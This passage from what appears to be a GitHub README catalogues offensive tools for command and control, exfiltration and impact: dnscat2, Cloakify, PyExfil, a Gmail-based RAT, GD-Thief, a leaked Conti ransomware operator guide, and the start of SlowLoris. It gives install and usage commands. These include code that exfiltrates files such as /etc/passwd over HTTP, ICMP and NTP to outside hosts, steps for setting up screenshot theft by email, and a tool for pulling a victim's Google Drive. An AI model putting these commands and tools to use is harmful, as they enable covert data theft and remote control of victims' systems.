0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A tool for establishing C2 connections via DNS, even if the attacker and victim machines are behind a firewall / network address translation (NAT).</p> <p dir="auto">The tool is designed to be stealthy and difficult to detect, as it uses legitimate DNS traffic to transmit data.</p> <p dir="auto"><strong>Install: (Compile - Server)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server/ gem install bundler bundle install"><pre>git clone https://github.com/iagox86/dnscat2.git <span class="pl-c1">cd</span> dnscat2/server/ gem install bundler bundle install</pre></div> <p dir="auto"><strong>Install: (Compile - Client)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/iagox86/dnscat2.git cd dnscat2/client/ make"><pre>git clone https://github.com/iagox86/dnscat2.git <span class="pl-c1">cd</span> dnscat2/client/ make</pre></div> <p dir="auto">Full installation information can be found in the <a href="https://github.com/iagox86/dnscat2#compiling">Installation Section</a>.</p> <p dir="auto"><strong>Usage: (Server)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Establish the server ruby ./dnscat2.rb DOMAIN.COM"><pre><span class="pl-c"><span class="pl-c">#</span> Establish the server</span> ruby ./dnscat2.rb DOMAIN.COM</pre></div> <p dir="auto"><strong>Usage: (Client)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Establish the client with authoritative domain ./dnscat2 DOMAIN.COM # Establish the client without authoritative domain ./dnscat2 --dns host=0.0.0.0,port=0000 # Ping the server from the client ./dnscat --ping DOMAIN.COM # Ping the server from the client, with custom dns resolver ip ./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping"><pre><span class="pl-c"><span class="pl-c">#</span> Establish the client with authoritative domain</span> ./dnscat2 DOMAIN.COM <span class="pl-c"><span class="pl-c">#</span> Establish the client without authoritative domain</span> ./dnscat2 --dns host=0.0.0.0,port=0000 <span class="pl-c"><span class="pl-c">#</span> Ping the server from the client</span> ./dnscat --ping DOMAIN.COM <span class="pl-c"><span class="pl-c">#</span> Ping the server from the client, with custom dns resolver ip</span> ./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping</pre></div> <p dir="auto"><strong>Usage: (Tunnels)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# (After establishing the client) You can open a new tunnelled port listen [lhost:]lport rhost:rport # Forward ssh connections through the dnscat2 client to an internal device listen 127.0.0.1:2222 10.10.10.10:22"><pre><span class="pl-c"><span class="pl-c">#</span> (After establishing the client) You can open a new tunnelled port</span> listen [lhost:]lport rhost:rport <span class="pl-c"><span class="pl-c">#</span> Forward ssh connections through the dnscat2 client to an internal device</span> listen 127.0.0.1:2222 10.10.10.10:22</pre></div> <p dir="auto">Full usage information can be found in the <a href="https://github.com/iagox86/dnscat2#usage">Usage Section</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210116521-0ef905ec-cc14-4cdc-9831-46bbded8c6af.png"><img src="https://user-images.githubusercontent.com/100603074/210116521-0ef905ec-cc14-4cdc-9831-46bbded8c6af.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/TryCatchHCF/Cloakify">Cloakify</a></h3><a id="user-content-cloakify" class="anchor" aria-label="Permalink: 🔙Cloakify" href="#cloakify"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">When exfiltrating victim files, DLP (Data Loss Prevention) solutions will typically trigger on strings within these files. Cloakify reduces this risk by transforming the data.</p> <p dir="auto">Cloakify transforms any filetype (e.g. .zip, .exe, .xls, etc.) into a list of harmless-looking strings. This lets you hide the file in plain sight, and transfer the file without triggering alerts.</p> <p dir="auto"><strong>Note:</strong> You can make your own ciphers, see <a href="https://github.com/TryCatchHCF/Cloakify#create-your-own-cipers">here</a> for more info.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/TryCatchHCF/Cloakify"><pre>git clone https://github.com/TryCatchHCF/Cloakify</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Cloakify some text python3 cloakify.py TEXT.txt ciphers/desserts.ciph > TEXT.cloaked # De-Cloakify the text python3 decloakify.py TEXT.cloaked ciphers/desserts.ciph"><pre><span class="pl-c"><span class="pl-c">#</span> Cloakify some text</span> python3 cloakify.py TEXT.txt ciphers/desserts.ciph <span class="pl-k">></span> TEXT.cloaked <span class="pl-c"><span class="pl-c">#</span> De-Cloakify the text</span> python3 decloakify.py TEXT.cloaked ciphers/desserts.ciph</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210117067-4611a42a-2ac7-44af-8aee-2e448c05909b.png"><img src="https://user-images.githubusercontent.com/100603074/210117067-4611a42a-2ac7-44af-8aee-2e448c05909b.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210116996-8ec36a12-8eef-44e9-924a-ad179e599910.png"><img src="https://user-images.githubusercontent.com/100603074/210116996-8ec36a12-8eef-44e9-924a-ad179e599910.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/ytisf/PyExfil">PyExfil</a></h3><a id="user-content-pyexfil" class="anchor" aria-label="Permalink: 🔙PyExfil" href="#pyexfil"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">"An Alpha-Alpha stage package, not yet tested (and will appreciate any feedbacks and commits) designed to show several techniques of data exfiltration is real-world scenarios."</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://www.github.com/ytisf/PyExfil;cd PyExfil;pip install -r requirements.txt;pip install py2exe;pip setup.py install"><pre>git clone https://www.github.com/ytisf/PyExfil<span class="pl-k">;</span><span class="pl-c1">cd</span> PyExfil<span class="pl-k">;</span>pip install -r requirements.txt<span class="pl-k">;</span>pip install py2exe<span class="pl-k">;</span>pip setup.py install</pre></div> <p dir="auto"><strong>Usage:</strong> (Full Usage <a href="https://github.com/ytisf/PyExfil/blob/master/USAGE.md">here</a>)</p> <div class="markdown-heading" dir="auto"><h4 tabindex="-1" class="heading-element" dir="auto">HTTP Cookies</h4><a id="user-content-http-cookies" class="anchor" aria-label="Permalink: HTTP Cookies" href="#http-cookies"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="from pyexfil.network.HTTP_Cookies.http_exfiltration import send_file, listen # For Client (exfil) send_file(addr='http://www.morirt.com', file_path=FILE_TO_EXFIL) # For Server (collecting) listen(local_addr='127.0.0.1', local_port=80)"><pre><span class="pl-k">from</span> <span class="pl-s1">pyexfil</span>.<span class="pl-s1">network</span>.<span class="pl-v">HTTP_Cookies</span>.<span class="pl-s1">http_exfiltration</span> <span class="pl-k">import</span> <span class="pl-s1">send_file</span>, <span class="pl-s1">listen</span> <span class="pl-c"># For Client (exfil)</span> <span class="pl-en">send_file</span>(<span class="pl-s1">addr</span><span class="pl-c1">=</span><span class="pl-s">'http://www.morirt.com'</span>, <span class="pl-s1">file_path</span><span class="pl-c1">=</span><span class="pl-c1">FILE_TO_EXFIL</span>) <span class="pl-c"># For Server (collecting)</span> <span class="pl-en">listen</span>(<span class="pl-s1">local_addr</span><span class="pl-c1">=</span><span class="pl-s">'127.0.0.1'</span>, <span class="pl-s1">local_port</span><span class="pl-c1">=</span><span class="pl-c1">80</span>)</pre></div> <div class="markdown-heading" dir="auto"><h4 tabindex="-1" class="heading-element" dir="auto">ICMP Echo 8</h4><a id="user-content-icmp-echo-8" class="anchor" aria-label="Permalink: ICMP Echo 8" href="#icmp-echo-8"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener # For Client (exfil) ip_addr = "127.0.0.1" send_file(ip_addr, src_ip_addr="127.0.0.1", file_path="", max_packetsize=512, SLEEP=0.1) # For Server (collecting) init_listener(ip_addr, saving_location="/tmp/")"><pre><span class="pl-k">from</span> <span class="pl-s1">pyexfil</span>.<span class="pl-s1">network</span>.<span class="pl-c1">ICMP</span>.<span class="pl-s1">icmp_exfiltration</span> <span class="pl-k">import</span> <span class="pl-s1">send_file</span>, <span class="pl-s1">init_listener</span> <span class="pl-c"># For Client (exfil)</span> <span class="pl-s1">ip_addr</span> <span class="pl-c1">=</span> <span class="pl-s">"127.0.0.1"</span> <span class="pl-en">send_file</span>(<span class="pl-s1">ip_addr</span>, <span class="pl-s1">src_ip_addr</span><span class="pl-c1">=</span><span class="pl-s">"127.0.0.1"</span>, <span class="pl-s1">file_path</span><span class="pl-c1">=</span><span class="pl-s">""</span>, <span class="pl-s1">max_packetsize</span><span class="pl-c1">=</span><span class="pl-c1">512</span>, <span class="pl-c1">SLEEP</span><span class="pl-c1">=</span><span class="pl-c1">0.1</span>) <span class="pl-c"># For Server (collecting)</span> <span class="pl-en">init_listener</span>(<span class="pl-s1">ip_addr</span>, <span class="pl-s1">saving_location</span><span class="pl-c1">=</span><span class="pl-s">"/tmp/"</span>)</pre></div> <div class="markdown-heading" dir="auto"><h4 tabindex="-1" class="heading-element" dir="auto">NTP Request</h4><a id="user-content-ntp-request" class="anchor" aria-label="Permalink: NTP Request" href="#ntp-request"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="from pyexfil.network.NTP.ntp_exfil import exfiltrate, ntp_listen, NTP_UDP_PORT # For Client (exfil) ip_addr = "127.0.0.1" exfiltrate("/etc/passwd", ip_addr, time_delay=0.1) # For Server (collecting) ntp_listener(ip="0.0.0.0", port=NTP_UDP_PORT)"><pre><span class="pl-k">from</span> <span class="pl-s1">pyexfil</span>.<span class="pl-s1">network</span>.<span class="pl-c1">NTP</span>.<span class="pl-s1">ntp_exfil</span> <span class="pl-k">import</span> <span class="pl-s1">exfiltrate</span>, <span class="pl-s1">ntp_listen</span>, <span class="pl-c1">NTP_UDP_PORT</span> <span class="pl-c"># For Client (exfil)</span> <span class="pl-s1">ip_addr</span> <span class="pl-c1">=</span> <span class="pl-s">"127.0.0.1"</span> <span class="pl-en">exfiltrate</span>(<span class="pl-s">"/etc/passwd"</span>, <span class="pl-s1">ip_addr</span>, <span class="pl-s1">time_delay</span><span class="pl-c1">=</span><span class="pl-c1">0.1</span>) <span class="pl-c"># For Server (collecting)</span> <span class="pl-en">ntp_listener</span>(<span class="pl-s1">ip</span><span class="pl-c1">=</span><span class="pl-s">"0.0.0.0"</span>, <span class="pl-s1">port</span><span class="pl-c1">=</span><span class="pl-c1">NTP_UDP_PORT</span>)</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/206573575-e90384c4-4a39-4f3c-96ec-face1f191808.png"><img src="https://user-images.githubusercontent.com/100603074/206573575-e90384c4-4a39-4f3c-96ec-face1f191808.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Viralmaniar/Powershell-RAT">Powershell RAT</a></h3><a id="user-content-powershell-rat" class="anchor" aria-label="Permalink: 🔙Powershell RAT" href="#powershell-rat"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/Viralmaniar/Powershell-RAT"><pre>git clone https://github.com/Viralmaniar/Powershell-RAT</pre></div> <p dir="auto"><strong>Usage:</strong> (Full Usage <a href="https://github.com/Viralmaniar/Powershell-RAT/blob/master/README.md">here</a>)</p> <div class="markdown-heading" dir="auto"><h4 tabindex="-1" class="heading-element" dir="auto">Setup</h4><a id="user-content-setup" class="anchor" aria-label="Permalink: Setup" href="#setup"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <ul dir="auto"> <li>Throwaway Gmail address</li> <li>Enable "Allow less secure apps" by going to <a href="https://myaccount.google.com/lesssecureapps" rel="nofollow">https://myaccount.google.com/lesssecureapps</a></li> <li>Modify the <code>$username</code> & <code>$password</code> variables for your account in the Mail.ps1 Powershell file</li> <li>Modify <code>$msg.From</code> & <code>$msg.To.Add</code> with throwaway gmail address</li> </ul> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210267906-68a2e852-d7b5-4b61-a747-77844e1d7d99.png"><img src="https://user-images.githubusercontent.com/100603074/210267906-68a2e852-d7b5-4b61-a747-77844e1d7d99.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/antman1p/GD-Thief">GD-Thief</a></h3><a id="user-content-gd-thief" class="anchor" aria-label="Permalink: 🔙GD-Thief" href="#gd-thief"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Tool for exfiltrating files from a target's Google Drive that you have access to, via Google's API.</p> <p dir="auto">This includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/antman1p/GD-Thief.git cd GD-Thief pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib"><pre>git clone https://github.com/antman1p/GD-Thief.git <span class="pl-c1">cd</span> GD-Thief pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib</pre></div> <p dir="auto">then...</p> <ol dir="auto"> <li>Create a new Google Cloud Platform (GCP) project</li> <li>Enable a Google Workspace API</li> <li>Configure OAuth Consent screen</li> <li>Create a credential</li> <li>Add the victim's Google account to the Application's Test Users</li> </ol> <p dir="auto">For detailed setup instructions see the <a href="https://github.com/antman1p/GD-Thief#how-to">How To Guide</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="usage: python3 gd_thief.py [-h] -m [{dlAll, dlDict[-d <DICTIONARY FILE PATH>]} [-t <THREAD COUNT>] help: This Module will connect to Google's API using an access token and exfiltrate files from a target's Google Drive. It will output exfiltrated files to the ./loot directory arguments: -m [{dlAll, dlDict}], --mode [{dlAll, dlDict}] The mode of file download Can be "dlAll", "dlDict [-d <DICTIONARY FILE PATH>]", or... (More options to come) optional arguments: -d <DICTIONARY FILE PATH>, --dict <DICTIONARY FILE PATH> Path to the dictionary file. Mandatory with download mode"-m, --mode dlDict" You can use the provided dictionary, per example: "-d ./dictionaries/secrets-keywords.txt" -t <THREAD COUNT>, --threads <THREAD COUNT> Number of threads. (Too many could exceeed Google's rate limit threshold) -h, --help show this help message and exit"><pre>usage: python3 gd_thief.py [-h] -m [{dlAll, dlDict[-d <span class="pl-k"><</span>DICTIONARY FILE PATH<span class="pl-k">></span>]} [-t <span class="pl-k"><</span>THREAD COUNT<span class="pl-k">></span>] help: This Module will connect to Google<span class="pl-s"><span class="pl-pds">'</span>s API using an access token and exfiltrate files</span> <span class="pl-s">from a target<span class="pl-pds">'</span></span>s Google Drive. It will output exfiltrated files to the ./loot directory arguments: -m [{dlAll, dlDict}], --mode [{dlAll, dlDict}] The mode of file download Can be <span class="pl-s"><span class="pl-pds">"</span>dlAll<span class="pl-pds">"</span></span>, <span class="pl-s"><span class="pl-pds">"</span>dlDict [-d <DICTIONARY FILE PATH>]<span class="pl-pds">"</span></span>, or... (More options to come) optional arguments: <span class="pl-k">-d</span> <span class="pl-k"><</span>DICTIONARY FILE PATH<span class="pl-k">></span>, --dict <span class="pl-k"><</span>DICTIONARY FILE PATH<span class="pl-k">></span> Path to the dictionary file. Mandatory with download mode<span class="pl-s"><span class="pl-pds">"</span>-m, --mode dlDict<span class="pl-pds">"</span></span> You can use the provided dictionary, per example: <span class="pl-s"><span class="pl-pds">"</span>-d ./dictionaries/secrets-keywords.txt<span class="pl-pds">"</span></span> <span class="pl-k">-t</span> <span class="pl-k"><</span>THREAD COUNT<span class="pl-k">></span>, --threads <span class="pl-k"><</span>THREAD COUNT<span class="pl-k">></span> Number of threads. (Too many could exceeed Google<span class="pl-s"><span class="pl-pds">'</span>s rate limit threshold)</span> <span class="pl-s"></span> <span class="pl-s"> -h, --help</span> <span class="pl-s"> show this help message and exit</span></pre></div> <p dir="auto">Nice <a href="https://antman1p-30185.medium.com/youre-a-gd-thief-1e02358fd557" rel="nofollow">blog post</a> explaining the logic behind the tool.</p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Impact</h1><a id="user-content-impact" class="anchor" aria-label="Permalink: Impact" href="#impact"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak">Conti Pentester Guide Leak</a></h3><a id="user-content-conti-pentester-guide-leak" class="anchor" aria-label="Permalink: 🔙Conti Pentester Guide Leak" href="#conti-pentester-guide-leak"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Conti is a ransomware group that is known for targeting large organizations and using sophisticated tactics to evade detection and maximize the impact of their attacks.</p> <p dir="auto">Conti has been responsible for a number of high-profile ransomware attacks, including ones against the computer systems of the City of Pensacola, Florida, and the computer systems of the Irish health service.</p> <p dir="auto">The <a href="https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak">Conti Pentester Guide Leak - Repository</a> contains leaked pentesting materials given to Conti ransomware group affilates.</p> <p dir="auto">Topics include:</p> <ul dir="auto"> <li>Configuring Rclone with MEGA for data exfiltration</li> <li>Configuring AnyDesk as persistence and remote access into a victim’s network</li> <li>Elevating and gaining admin rights inside a company’s hacked network</li> <li>Taking over domain controllers</li> <li>Dumping passwords from Active Directory</li> </ul> <p dir="auto"><strong>Note:</strong> <em><a href="https://www.vx-underground.org/" rel="nofollow">vx-underground.org</a> obtained more training materials and tools used by Conti ransomware operators <a href="https://share.vx-underground.org/Conti/" rel="nofollow">here</a>.</em></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210856582-44a9bf16-23d4-4b7e-9e91-8604c3191e78.png"><img src="https://user-images.githubusercontent.com/100603074/210856582-44a9bf16-23d4-4b7e-9e91-8604c3191e78.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak">https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/gkbrk/slowloris">SlowLoris</a></h3><a id="user-content-slowloris" class="anchor" aria-label="Permalink: 🔙SlowLoris" href="#slowloris"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 